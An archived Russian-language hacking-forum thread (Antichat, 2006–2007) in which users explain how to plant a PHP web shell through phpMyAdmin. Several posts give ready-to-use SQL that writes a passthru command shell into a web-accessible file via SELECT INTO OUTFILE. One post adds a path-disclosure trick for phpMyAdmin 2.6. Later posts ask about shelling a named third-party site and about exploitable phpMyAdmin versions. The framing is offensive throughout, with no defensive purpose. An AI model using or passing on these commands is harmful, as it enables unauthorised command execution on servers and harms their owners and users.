PhpMyAdmin [Архив] - Форум АНТИЧАТ

Просмотр полной версии : PhpMyAdmin

dimauz

14.03.2006, 18:13

Возможно ли закачать на сервер удаленный веб шелл имея доступ к phpmyadmin ?

GreenBear

14.03.2006, 18:21

UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;

dimauz

14.03.2006, 19:44

UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;

Не получается ... возможно я что-то делаю не так :(

GreenBear

14.03.2006, 20:10

как это не работает?
попробуй так... раз там понять не можеш.

CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/home/user/www/shell.php' FROM `shell`;
DROP TABLE `shell`;

работает на 100% =)
/home/user/www/shell.php
замени на свой путь...

Azazel

14.03.2006, 20:16

UPDATE `существующая таблица` SET `существующий параметер`='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT `существующая таблица`, `существующий параметер` into OUTFILE '/home/user/полный серверный путь/shell.php' FROM существующая таблица where id=1;

Попробовал объяснить подробней.

Советую почитать как правильно задавать вопросы в технических форумах.

KEZ

14.03.2006, 20:20

Не получается ... возможно я что-то делаю не так

Дело в том что нужно не втупую переписать код что тебе дал грин_бир а хотябы немного подумать, сменить названия директорий, к примеру..мдаа

dimauz

14.03.2006, 20:28

Спасибо за помощь. Уже разобрался :cool:

c411k

16.03.2006, 15:10

SELECT '<? passthru("$cmd"); ?>' into OUTFILE "/home/hosting/wwwdata/sm.php";

Ponchik

04.04.2006, 10:46

Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'

~FoX~

24.01.2007, 10:51

разжуйте для noooба плз

_Great_

24.01.2007, 11:03

Выше все написано

~FoX~

24.01.2007, 11:42

ну а для полных нубов можете видео соорудить???

cardons

24.01.2007, 11:50

Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'
Ты путь походу непрописываешь куда шелл залить.
Или возможно он ругаеться на : если ты пишешь полностью путь.

~FoX~

24.01.2007, 11:55

да мне бы хоть научиться файлы в phpmyadmin заливать

ice1k

24.01.2007, 12:13

разжуйте для noooба плз
Что именно тебе разжевать?

cardons

24.01.2007, 12:14

Чтобы узнать путь сайта. Если версия phpmyadmin 2.6.*
То делай так phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE
Он тебе покажет путь.
Ну а вообще читай тему которые уже созданы
http://forum.antichat.ru/threadnav31153-1-10-phpMyAdmin.html

~FoX~

24.01.2007, 12:19

как remview залить на другой ip код к eго phpmyadmin я знаю

cardons

24.01.2007, 12:23

как remview залить на другой ip код к eго phpmyadmin я знаю
Нече непонял.Под словом код я как понимаю ты подразумеваешь путь а насчет ип нече непонял. Сформулируй нормальней.

~FoX~

24.01.2007, 12:56

всем спс инфа больше не требуется Ice мне помог)))

cardons

26.01.2007, 03:42

Кто нить знает баги в версиях
2.8.2.4
и 2.8.2

cardons

26.01.2007, 18:04

кто нибудь знает как с помощью этого http://l2db.ru/phpmyadmin/scripts/setup.php залить шелл?

ice1k

26.01.2007, 23:06

кто нибудь знает как с помощью этого http://l2db.ru/phpmyadmin/scripts/setup.php залить шелл?
Было бы всё так просто ;)